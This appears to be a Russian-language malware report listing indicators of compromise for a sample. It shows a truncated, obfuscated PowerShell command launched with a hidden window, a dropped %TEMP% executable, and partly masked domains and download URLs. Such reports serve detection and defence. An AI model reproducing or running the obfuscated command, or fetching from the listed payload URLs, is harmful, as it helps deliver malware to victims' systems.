Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " $(Set-ITEM 'vaRiAbLE:Ofs' '' ) " +[sTRing]('21}112}80t82e93K105v17N12N17Z95K84>70Z28>94}83v91v84v82>69N17w67K80!95N85N94t92}10!21!70}125>127}71N107N17e12>17t95v84w70N28N94K83Z91!84t82e69!17>...
- %TEMP%\428717.exe
- %TEMP%\428717.exe
- %TEMP%\428717.exe
- 'ar##ard.me':80
- 'av##in.pro':443
- 'pk#.goog':80
- 'ke######koltukyikama.net':80
- http://ar##ard.me/bIPadE/
- http://pk#.goog/gsr1/gsr1.crt
- http://www.ke######koltukyikama.net/Gt9oFv/
- 'av##in.pro':443
- DNS ASK ba####carpet.com
- DNS ASK ga####e-lidia.ru
- DNS ASK ar##ard.me
- DNS ASK av##in.pro
- DNS ASK pk#.goog
- DNS ASK ke######koltukyikama.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " $(Set-ITEM 'vaRiAbLE:Ofs' '' ) " +[sTRing]('21}112}80t82e93K105v17N12N17Z95K84>70Z28>94}83v91v84v82>69N17w67K80!95N85N94t92}10!21!70}125>127}71N107N17e12>17t95v84w70N28N94K83Z91!84t82e69!17>...' (со скрытым окном)